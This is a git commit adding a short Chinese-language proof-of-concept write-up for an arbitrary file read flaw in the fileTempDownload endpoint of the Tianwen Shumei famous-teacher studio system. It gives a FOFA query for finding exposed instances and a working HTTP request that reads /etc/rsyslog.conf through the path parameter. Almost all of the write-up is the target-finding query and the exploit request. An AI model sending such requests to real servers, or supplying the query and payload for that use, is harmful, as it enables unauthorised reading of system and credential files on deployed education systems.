Create 天闻数媒名师工作室系统fileTempDownload任意文件读取.md

2025-06-20 18:01:14 +00:00 · 2025-04-21 09:11:04 +08:00 · 2025-04-21 09:11:04 +08:00 · 6db42c1bef
commit 6db42c1bef
parent 0e4b03cb1c
1 changed files with 16 additions and 0 deletions
--- a/wpoc/天闻数媒名师工作室系统/天闻数媒名师工作室系统fileTempDownload任意文件读取.md
+++ b/wpoc/天闻数媒名师工作室系统/天闻数媒名师工作室系统fileTempDownload任意文件读取.md
@ -0,0 +1,16 @@
 # 天闻数媒名师工作室系统fileTempDownload任意文件读取
 # 一、漏洞简介
 天闻数媒名师工作室系统fileTempDownload接口存在任意文件读取漏洞
 # 二、影响版本
 + 天闻数媒名师工作室系统
 # 三、资产测绘
 + fofa`body="/static/js/bootstrap/bootstrap.css" && title="名师工作室"`
 # 四、漏洞复现
 ```plain
 GET /fileUploadAndDownload/fileTempDownload?path=/etc/rsyslog.conf HTTP/1.1
 Host: 127.0.0.1:8080
 ```